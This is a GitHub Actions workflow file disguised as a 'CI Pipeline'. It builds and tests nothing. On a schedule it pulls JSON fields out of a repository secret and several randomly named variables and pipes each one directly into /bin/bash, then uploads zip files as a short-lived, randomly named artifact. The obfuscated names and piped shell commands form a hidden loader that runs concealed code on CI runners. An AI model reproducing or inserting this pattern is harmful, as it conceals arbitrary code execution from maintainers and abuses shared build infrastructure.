name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '20 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          eq473: ${{ secrets.eq473 }}
        run: |
          printf '%s' "$eq473" | jq -r .nwo949 | /bin/bash
          echo $u22 | jq -r .rhegn47 | /bin/bash
          echo $h1975 | jq -r .emp8 | /bin/bash
          printf '%s' "$rbgia0162" | jq -r .br435 | /bin/bash
          printf '%s' "$tgirc59672" | jq -r .ioqgw8 | /bin/bash
          printf '%s' "$jwvdz516" | jq -r .zfgl2 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: mP5G7fot
          path: "*.zip"
          retention-days: 1
